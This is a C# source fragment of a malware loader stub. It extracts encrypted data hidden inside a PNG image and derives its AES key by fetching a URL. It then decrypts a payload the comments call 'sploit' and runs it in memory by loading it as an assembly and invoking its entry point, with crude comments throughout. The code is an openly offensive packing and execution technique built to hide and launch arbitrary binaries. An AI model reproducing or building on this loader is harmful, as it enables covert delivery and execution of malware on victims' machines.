public static byte[] stub_launch(byte[] url_data, string enc_pass, int png_offset, int pass_offset) { // this was NOT easy. Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 }; //change Byte[] b64_data_only = new Byte[url_data.Length - png_offset]; Buffer.BlockCopy(url_data, png_offset, b64_data_only, 0, url_data.Length - png_offset); Byte[] comp_data = base64_decode(b64_data_only); Byte[] enc_data = decompress_bin(comp_data); int nn = enc_data[0] + (enc_data[1] << 8); Byte[] enc_pre_pass = new Byte[nn]; Array.Copy(enc_data, 2, enc_pre_pass, 0, enc_pre_pass.Length); Byte[] decrypted_url_pass = Enc.decrypt_small_pass(enc_pass, enc_pre_pass, salt); Byte[] url_pass = Enc.depadit(decrypted_url_pass); int enc_data_offset = enc_pre_pass.Length + 2; String nurl = Encoding.UTF8.GetString(url_pass); Byte[] enc_page; if (test_file(nurl)) { enc_page = File.ReadAllBytes(nurl); } else { enc_page = get_page(nurl); } Byte[] master_pass = hash_page(enc_page, pass_offset); Byte[] pass = new Byte[0x20]; Array.Copy(master_pass, master_pass.Length / 4, pass, 0, master_pass.Length / 2); Byte[] pass_4 = new Byte[0x10]; Array.Copy(master_pass, master_pass.Length / 8, pass_4, 0, master_pass.Length / 4); Byte[] enc_sploit_data = new Byte[enc_data.Length - enc_data_offset]; Array.Copy(enc_data, enc_data_offset, enc_sploit_data, 0, enc_sploit_data.Length); Byte[] decrypted_sploit_bytes = Enc.aes_decrypt(enc_sploit_data, pass, pass_4); //moneyshot return(decrypted_sploit_bytes); }
// test our final image to veryify its working! public static void test_everything(string output_file, string enc_pass, int offset, byte[] b64_test, string[] main_args, int code_position) { Byte[] salt = { 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2 }; Console.WriteLine("We are debugging it to make sure everything works properly!"); Byte[] enc_testdata = File.ReadAllBytes(output_file); //int pos = do_png(enc_testdata); //pos = pos + 37; // header length is 37 int pos = code_position; Byte[] b64_data_only = new Byte[enc_testdata.Length - pos]; Buffer.BlockCopy(enc_testdata, pos, b64_data_only, 0, enc_testdata.Length - pos); debug_print("TESTING, base64 data {0}", b64_data_only); Byte[] comp_data = base64_decode(b64_data_only); Byte[] enc_data = decompress_bin(comp_data); // the length of the url, stored as Int16 int nn = enc_data[0] + (enc_data[1] << 8); Byte[] enc_pre_pass = new Byte[nn]; Array.Copy(enc_data, 2, enc_pre_pass, 0, enc_pre_pass.Length); Byte[] decrypted_url_pass = Enc.decrypt_small_pass(enc_pass, enc_pre_pass, salt); Byte[] url_pass = Enc.depadit(decrypted_url_pass); // the offset is our enc data minus the url int enc_data_offset = enc_pre_pass.Length + 2; String nurl = Encoding.UTF8.GetString(url_pass); // get file or webpage for encryption Byte[] enc_page; if (test_file(nurl)) { enc_page = File.ReadAllBytes(nurl); } else { enc_page = get_page(nurl); } Byte[] master_pass = hash_page(enc_page, offset); debug_print("Our testing master_pass {0}", master_pass); // I HATE doing it like this but meh... Byte[] pass = new Byte[0x20]; Byte[] pass_4 = new Byte[0x10]; Array.Copy(master_pass, master_pass.Length / 4, pass, 0, master_pass.Length / 2); Array.Copy(master_pass, master_pass.Length / 8, pass_4, 0, master_pass.Length / 4); debug_print("Password Is: {0}", pass); debug_print("The IV Is: {0}", pass_4); Byte[] enc_sploit_data = new Byte[enc_data.Length - enc_data_offset]; // get ready for the money shot Array.Copy(enc_data, enc_data_offset, enc_sploit_data, 0, enc_sploit_data.Length); Byte[] decrypted_sploit_bytes = Enc.aes_decrypt(enc_sploit_data, pass, pass_4); debug_print("Our encrypted file is: {0}", decrypted_sploit_bytes); Console.WriteLine("Everything should have worked, loading the binary."); // load the bytes into Assembly Assembly a = Assembly.Load(decrypted_sploit_bytes); // search for the Entry Point MethodInfo method = a.EntryPoint; if (method != null) { // GlobalAssemblyCache <-- ???? // create an istance of the Startup form Main method Object o = a.CreateInstance(method.Name); // copy main_args into new array, to use in object String[] prog_args = new String[main_args.Length - 1]; // adjust this if we use more args! Array.Copy(main_args, 1, prog_args, 0, main_args.Length - 1); try { // invoke the application starting point method.Invoke(o, new Object[] { prog_args }); // all over her face } catch (Exception e) { Console.WriteLine(e); } } }